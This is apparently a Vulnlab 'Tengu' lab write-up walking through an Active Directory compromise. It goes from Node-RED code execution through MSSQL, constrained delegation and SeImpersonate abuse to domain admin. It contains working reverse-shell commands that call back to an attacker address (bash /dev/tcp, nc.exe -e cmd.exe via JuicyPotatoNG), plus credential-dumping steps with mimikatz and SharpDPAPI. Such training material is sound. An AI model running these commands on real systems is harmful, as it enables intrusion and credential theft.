# Vulnlab - Tengu ## DC.tengu.vl ```bash PORT STATE SERVICE VERSION 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=DC.tengu.vl | Issuer: commonName=DC.tengu.vl | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-09-14T15:26:33 | Not valid after: 2025-03-16T15:26:33 | MD5: b350:11ed:41ce:ff32:a34f:0088:ce22:96f5 |_SHA-1: 711b:6409:e399:0771:d3d3:7eba:1938:5914:7c84:7528 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` ## SQL.tengu.vl ```bash PORT STATE SERVICE VERSION 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2024-09-15T15:30:31+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=SQL.tengu.vl | Issuer: commonName=SQL.tengu.vl | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-09-14T15:26:45 | Not valid after: 2025-03-16T15:26:45 | MD5: 3cd6:9298:18df:b91e:5194:c958:0df4:528b |_SHA-1: b304:c807:0de4:a171:0c1a:8b16:1f3e:bd29:2e21:99b5 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` ## nodered.tengu.vl ```bash PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |_ 256 41:c7:d4:28:ec:d8:5b:aa:97:ee:c0:be:3c:e3:aa:73 (ED25519) 1880/tcp open vsat-control? Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Both windows hosts had only RDP service enabled, on linux hosts, there was something hosted on port 1880 which on googling shows it runs Node-RED, which is a flow based development tool for visual programming used in IoT devices

## Remote Command Execution Through Node-RED Node-RED is known for getting remote command execution (RCE), to achieve this, we'll need to create a flow by timestamp block following exec block

Replacing the curl command with bash reverse shell

```bash bash -i >& /dev/tcp/10.8.0.136/2222 0>&1 ``` After having the shell, it can be stabilized with python3 to use it as a normal shell

From `nodered` directory, we can find some type of hashed password but not really sure who this belongs to and how this can be cracked

## Accessing MSSQL From sql node properties, we can see the connection string with the username `nodered_connector`

So there's a script to decrypt the node-red credentials, which needs `flows_cred.json` and `.config.runtime.json` https://gist.github.com/Yeeb1/fe9adcd39306e3ced6bdfc7758a43519

In order to connect to MSSQL, we'll need to performing pivoting since that service isn't exposed we'll use chisel socks proxy ```bash chisel server --reverse -p 3000 chisel client 10.8.0.136:3000 R:socks ```

With this, we'll be able to reach port 1433 on sql.tengu.vl

Trying to enable `xp_cmdshell` resulted in no luck as this user didn't had privileged in mssql

Enumerating the databases, there are two, which are not available by default, `Dev` and `Demo`

Dev didn't had anything interesting while there was one set of credential from Demo

Attempting to crack this with rockyou.txt didn't work as the password wasn't present there however crackstation came in handy here

Having the credentials, we can verify if this is a valid domain user

With `bloodhound-python`, the domain can be enumerated ```bash proxychains bloodhound-python -d tengu.vl -u t2_m.winters -p 'Tengu123' -c all -ns 10.10.183.37 ```

## Escalating privileges on linux host From bloodhound, t2_m.winters is a member of linux admin group which means we can have local admin on the linux host

Through ssh we can easily switch to `t2_m.winters` user

this host has `ReadGMSAPassword` on `GMSA01$` account

## Constrained Delegation on SQL Host The NThash can be retrieved from `/etc/krb5.keytab`, this file contains service account hash in this case has NODERED's NThash, the hash can be extracted with KeyTabExtract https://github.com/sosdave/KeyTabExtract/tree/master

This hash can be verified by authenticating on DC

GMSA hash can be retrieved by using `--gmsa` module on LDAP ```bash proxychains nxc ldap 10.10.238.213 -u 'NODERED$' -H 'hash' --gmsa ```

This account has `AllowedToDelegate` permission on SQL host which means we can impersonate as a local admin on this host through MSSQL service, performing constrained delegation

With getST.py we can try to impersonate as administrator user for MSSQL service sql host but it didn't worked for administrator

Instead of admin, we can check what other users we could target, there's a group name `SQL Admins` , with two users

Here we can try to impersonate `T1.M_Winters` and then login through MSSQL using the ticket ```bash proxychains impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' -impersonate 'T1_M.WINTERS' -hashes :hash 'tengu.vl/gMSA01$'@sql.tengu.vl -dc-ip 10.10.168.213 ```

From here xp_cmdshell can be enabled and system commands can be executed in the context of `gmsa01$`

With netcat, we can get a reverse shell

Checking our privileges, we can get local administrator by abusing `SeImpersonatePrivilege` with JuicyPotato-NG or any other recent potato exploit

```bash JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:/Windows/Temp/nc.exe 10.8.0.136 3333 -e cmd.exe" ```

## Lateral Movement - Extracting Credentials Trough DPAPI Running mimikatz to dump local admin hash and checking if there are any hashes in lsass

With `lsadump::cache` , domain cached credentials can be found where there's cached credentials for `c.fowler` but obviously this is not in NThash format so it cannot be used in pth unless it's gets cracked, which in this case was not the way

To dump saved credentials from credential Manager/ task scheduler, we can target DPAPI which stores credentials with user specific keys, being a local admin we can utilize `sharpdpapi` to dump all credentials ```bash SharpDPAPI.exe machinecredentials ```

## Using kerberos authentication to spawn a shell as T0_c.fowler T0_c.fowler is a domain admin, authenticating against the DC to see if the password is valid

But the plain text password wasn't working and it's probably due to admin users belonging to Protected Users Group which is why we'll need to use kerberos authentication

So instead, using `kinit` we can request TGT for the user by specifying the plain text password and we'll get our ticket using by modifying the `/etc/krb5.conf` configuration file ```bash [libdefaults] default_realm = TENGU.VL kdc_timesync = 1 ccache_type = 4 forwardable = true proxiable = true rdns = false dns_canonicalize_hostname = false fcc-mit-ticketflags = true [realms] TENGU.VL = { kdc = dc.tengu.vl } [domain_realm] .tengu.vl = TENGU.VL ```

Having the ticket, we can just dump hashes from ntds.dit using `secretsdump.py` or just spawn a shell using smb, wmi or psexec

# References - https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/ - https://gist.github.com/Yeeb1/fe9adcd39306e3ced6bdfc7758a43519 - https://github.com/sosdave/KeyTabExtract/tree/master